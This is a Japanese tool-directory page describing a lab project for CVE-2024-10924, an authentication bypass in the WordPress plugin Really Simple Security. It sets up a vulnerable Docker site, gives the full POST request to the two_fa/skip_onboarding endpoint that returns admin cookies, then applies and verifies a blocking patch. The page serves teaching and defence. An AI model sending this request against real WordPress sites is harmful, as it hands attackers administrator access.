Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-10924 — WordPress Really Simple Securityの認証バイパスであるCVE-2024-10924の悪用と緩和を示します。自動化されたPythonエクスプロイト、手動のBurp Suite手順、パッチ検証を含みます。 | Kitploit
ツール/GitHubGitHub/bodoinon/cve-2024-10924
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト認証学習と教育
GitHubbodoinon/cve-2024-10924

CVE-2024-10924

WordPress Really Simple Securityの認証バイパスであるCVE-2024-10924の悪用と緩和を示します。自動化されたPythonエクスプロイト、手動のBurp Suite手順、パッチ検証を含みます。

リポジトリを見る
28ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-10924 - Really Simple Security における認証バイパス

概要 このプロジェクトは、WordPressプラグイン「Really Simple Security」における重大な認証バイパス脆弱性であるCVE-2024-10924の悪用と緩和策を実証するものです。

ステップ1: 環境構築

脆弱なWordPress環境を起動します: cd wordpress-really-simple-security-authn-bypass-vulnerable-application docker-compose up -d

コンテナが実行中であることを確認します: docker ps

WordPressにアクセスします: http://localhost:1337

必要なツール:

  • Python 3.x (自動エクスプロイト用)
  • Burp Suite (手動による悪用用)
  • GVM (Greenbone Vulnerability Management) スキャン用

ステップ2: 脆弱性スキャン

ターゲットに対してGVMスキャンを実行します:

  • ターゲット: http://localhost:1337
  • 期待される結果: CVE-2024-10924 が検出される
  • 深刻度: Critical (CVSS 9.8)
  • 脆弱なエンドポイント: /reallysimplessl/v1/two_fa/skip_onboarding

ステップ3: エクスプロイト

方法A - 自動化されたPythonエクスプロイト: python exploit.py

方法B - 手動によるBurp Suite:

  1. http://localhost:1337 へのトラフィックをインターセプトします

  2. POSTリクエストを送信します: POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1 Host: localhost:1337 Content-Type: application/json

    {"user_id": 1, "login_nonce": "hack", "redirect_to": "/wp-admin/"}

  3. 管理者セッションを含むSet-Cookieヘッダーがレスポンスに含まれることを確認します

期待される結果:

  • ステータス: 200 OK
  • 管理者セッションのクッキーが返される
  • 認証情報なしでのバイパスに成功する

ステップ4: 緩和策

パッチを適用して脆弱なエンドポイントをブロックします: .\patch.ps1

この操作の内容:

  • mitigation.php をコンテナの /wp-content/mu-plugins/ にコピーします
  • 脆弱なREST APIエンドポイントへのすべてのリクエストをブロックします
  • エクスプロイト試行に対して403 Forbiddenを返します

ステップ5: 検証

エクスプロイトを再実行します (方法AまたはB): python exploit.py

緩和策適用後の期待される結果:

  • ステータス: 403 Forbidden
  • 管理者クッキーは返されない
  • 攻撃が正常にブロックされる

追加メモ

環境を停止するには: docker-compose down

コンテナのログを表示するには: docker-compose logs -f

WordPress管理者に正規にアクセスするには: http://localhost:1337/wp-admin (認証情報は docker-compose.yml を確認してください)

ツールをダウンロード